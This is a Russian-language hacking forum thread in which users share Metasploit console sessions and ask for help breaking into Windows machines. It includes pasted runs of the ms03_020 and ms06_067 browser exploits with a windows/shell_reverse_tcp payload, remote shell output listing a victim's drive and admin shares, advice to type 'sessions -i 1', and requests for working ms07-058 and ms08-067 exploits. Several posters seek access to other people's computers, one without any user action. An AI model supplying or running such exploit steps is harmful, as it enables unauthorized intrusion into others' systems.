msf > use windows/browser/ms03_020_ie_objecttype msf exploit(ms03_020_ie_objecttype) > set SRVHOST 10.10.12.206 SRVHOST => 10.10.12.206 msf exploit(ms03_020_ie_objecttype) > set PAYLOAD windows/shell_reverse_tcp PAYLOAD => windows/shell_reverse_tcp msf exploit(ms03_020_ie_objecttype) > exploit [-] Exploit failed: The following options failed to validate: LHOST. msf exploit(ms03_020_ie_objecttype) > set LHOST 10.10.12.206 LHOST => 10.10.12.206 msf exploit(ms03_020_ie_objecttype) > exploit [*] Started reverse handler [*] Using URL: http://10.10.12.206:8080/xPB3Ch32qOgpE6s [*] Server started. [*] Sending exploit to 10.10.12.208:1200... что дальше ДЕЛАТЬ??как получить командную строку удолённой машины??
Угу, конвертнуть надо в EXE. http://short.stop.home.att.net/freesoft/batch2.htm#batcomp сессия должна стартануть (напишет в консоли), потом чтоб в неё попасть из консоли, надо набрать sessions -i 1 Вот https://forum.antichat.ru/showthread.php?t=28601 читайте про версию 3.0 (очень много общего с той что сейчас) и не задавайте лишних вопросов... P.S. Модеры снимите закрепление этой статьи плиз... (уже стара, потому как описывает версию 2.7) и замените на эту https://forum.antichat.ru/showthread.php?t=28601 (к примеру) либо эту https://forum.antichat.ru/threadnav38434-2-10.html
C:\>chcp 1251 chcp 1251 ??????? ??????? ????????: 1251 C:\>dir dir ??? ? ?????????? C ?? ????? ?????. ???????? ????? ????: CA4C-CED1 ?????????? ????? C:\ 30.06.2007 10:40 0 AUTOEXEC.BAT 15.12.2008 10:47 538 ComartDvrSet.ini 30.06.2007 10:40 0 CONFIG.SYS 30.06.2007 10:56 <DIR> Documents and Settings 12.06.2008 10:05 <DIR> kav 04.07.2007 15:55 <DIR> My Music 29.10.2008 11:01 <DIR> Program Files 24.02.2008 10:11 231?092 sc.log 30.06.2007 11:00 <DIR> totalcmd 05.12.2008 09:58 <DIR> WINDOWS 4 ?????? 231?630 ???? 6 ????? 52?420?149?248 ???? ???????? КАК нормальную кодировку сделать??
IPC$ ????????? IPC D$ D:\ ??????????? ????? ?????? F$ F:\ ??????????? ????? ?????? ADMIN$ C:\WINDOWS ????????? Admin C$ C:\ ??????????? ????? ?????? q$ d:\ ??????? ????????? ???????. подскажите как эти вопросы убрать
Я так понял, что в MSF 3.2 юзается действительно юникод. А в консоли cmd 866/1251 и т.д. (т.е. однобайтовые кодировки).
Помогите пожалуйсто 21:12:20 - ms06_067_keyframe [*] Launching exploit windows/browser/ms06_067_keyframe... 21:12:20 - ms06_067_keyframe [*] Started reverse handler 21:12:20 - ms06_067_keyframe [*] Using URL: http://192.168.0.102:8080/1 21:12:20 - ms06_067_keyframe [*] Server started. 21:12:30 - ms06_067_keyframe [*] Sending Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability to 192.168.0.102:13194... а дальше ничего не происходит в чем трабл?
ms07-058 естьли с плоит под эту уязвимость?? ПОДСКАЖИТЕ ктонибуть пару сплоитов актуальных в локалке нетапи не везде проходит!!! ЗАРАНИЕ спс!
Я не давно начал интересоваца етои теме, так что я в етом деле новичок, но очень хочу разабраца во всём ето. Из всего что я читал про взлом компов, я понял что не обоитисй без помоши юзера, то ести необходимо чтоб какимто оброзом ктото, както запустил на атакуемый комп наш exploit, backdoor или трои. А можно както получить доступ без чиито участии?
Блин немогу догнать неполучается 3 видео позыпил всеравно недошло конечный результат а геде как у вас. я так На виртуальном компе пробывал, в сети ппробывал на АДСл провбывал всеравно нет стыковкви с клиентом просьба у меня инет девецит пешите мне в ICQ она хоть бесплатноя 259207039
Я разобрался бугага тока пло что когда делаеш мониторин выходит командноя строка у Неприятеля это сильно портит взлом. По вашим стотьям и роликам нефега не получилось. я ношел по лутше на 120 % что получится http://takeworld.blogspot.com/search/label/metasploit и можна неписать вобще свой IP всерамно Метасплойт сам автоматом ставит
посоветуйте как решить такую проблему: в метасплоите, когда выбираешь уязвимость ms08-067 в списке выбора ОС нет Windows 2003 server (Russian) а есть только English.